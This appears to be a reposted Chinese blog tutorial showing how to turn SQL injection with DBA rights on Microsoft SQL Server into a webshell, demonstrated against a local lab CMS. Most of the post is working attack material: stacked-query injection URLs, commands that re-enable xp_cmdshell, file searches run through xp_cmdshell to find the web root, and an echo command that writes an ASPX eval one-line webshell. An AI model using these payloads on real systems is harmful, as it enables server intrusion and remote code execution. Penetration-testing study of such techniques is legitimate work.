MSSQL DBA权限获取WEBSHELL的过程

栏目: 数据库 · SQL Server · 发布时间: 6年前

内容简介:MSSQL DBA权限获取WEBSHELL的过程

本文主要通过一个案例来演示一下当MSSQL是DBA权限,且不知道路径的时候如何去获取WEBSHELL。当然这种方式对站库分离的无效。

我测试的环境是在Win7 64位下,数据库是SQLServer 2000,IIS版本是7.5,程序是采用风讯的CMS。后台登录后有多处注入,因为这里是演示用注入获取WEBSHELL,因此就不考虑后台上传的情况了,只是用注入来实现。

过程

首先找到一个如下的注入点:

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1' and 1=user;--

MSSQL DBA权限获取WEBSHELL的过程

通过SQLMAP可以查看到是DBA权限

MSSQL DBA权限获取WEBSHELL的过程

创建临时表

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));--

MSSQL DBA权限获取WEBSHELL的过程

在WINDOWS下查找文件用如下命令:

for /r 目录名:\ %i in (匹配模式) do @echo %i

例如在C盘下搜索NewsList.aspx,可以使用 for /r c:\ %i in (Newslist*.aspx) do @echo %i 或者 for /r c:\ %i in (Newslist.aspx*) do @echo %i

使用 for /r c:\ %i in (Newslist*.aspx) do @echo %i 的搜索结果

MSSQL DBA权限获取WEBSHELL的过程

一定要在匹配模式里面加上一个*号,不然搜索出来的是全部的目录,后面拼接了你搜索的内容。

使用 for /r c:\ %i in (Newslist.aspx) do @echo %i 的搜索结果

MSSQL DBA权限获取WEBSHELL的过程

用xp_cmdshell执行查找文件的命令,并将搜索的结果插入到临时表中

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r c:\ %i in (Newslist*.aspx) do @echo %i ';--

如果无法执行xp_cmdshell,并提示如下错误 SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。

MSSQL DBA权限获取WEBSHELL的过程

可以使用如下命令来启用xp_cmdshell

;EXEC sp_configure 'show advanced options',1;//允许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;  //打开xp_cmdshell扩展
RECONFIGURE;--

然后再次执行搜索命令。

MSSQL DBA权限获取WEBSHELL的过程

在执行上述搜索和插入过程后,可以使用 ' and (select(*) from tt_tmp)>1 页面返回是否正常来判断是否有搜索结果。当没有找到的话, select(*) from tt_tmp 的结果为1,否则大于1。如果没有的话,就换目录,可以试试其他盘符,如 ';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r d:\ %i in (Newslist*.aspx) do @echo %i ';-- 。也可以使用sqlmap来查看条数。

找到结果后将表中数据读取出来

MSSQL DBA权限获取WEBSHELL的过程

然后根据导出结果的路径来判断是否可能为WEB目录。然后写入一个测试文件,看是否可以访问来进一步证实结果。

这里在根目录写了一个txt文件,写别的目录怕因为没有权限而无法访问。

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo test >c:\\WWW\\2333.txt';--

然后访问 http://192.168.232.138:81/2333.txt

MSSQL DBA权限获取WEBSHELL的过程

成功访问,然后就是写一句话

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx' ;--

成功写入。然后就是进一步的操作了,这里就不概述了。

MSSQL DBA权限获取WEBSHELL的过程

DOS命令将文件写入文本中时,遇到 <> 应在前面加上 ^

总结

这里一共有三个小的知识点:

1.sa用户如何开启xp_cmdshell

EXEC sp_configure 'show advanced options',1;//允许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;  //打开xp_cmdshell扩展
RECONFIGURE;

2.Windows下利用dos如何搜索文件

for /r c:\ %i in (Newslist*.aspx) do @echo %i
for /r c:\ %i in (Newslist.aspx*) do @echo %i

3.dos命令下写文件遇到 <> 如何处理

echo ^<^> > 123.txt

以上所述就是小编给大家介绍的《MSSQL DBA权限获取WEBSHELL的过程》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

The Shallows

The Shallows

Nicholas Carr / W. W. Norton & Company / 2011-6-6 / USD 15.95

"Is Google making us stupid?" When Nicholas Carr posed that question, in a celebrated Atlantic Monthly cover story, he tapped into a well of anxiety about how the Internet is changing us. He also crys......一起来看看 《The Shallows》 这本书的介绍吧!

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具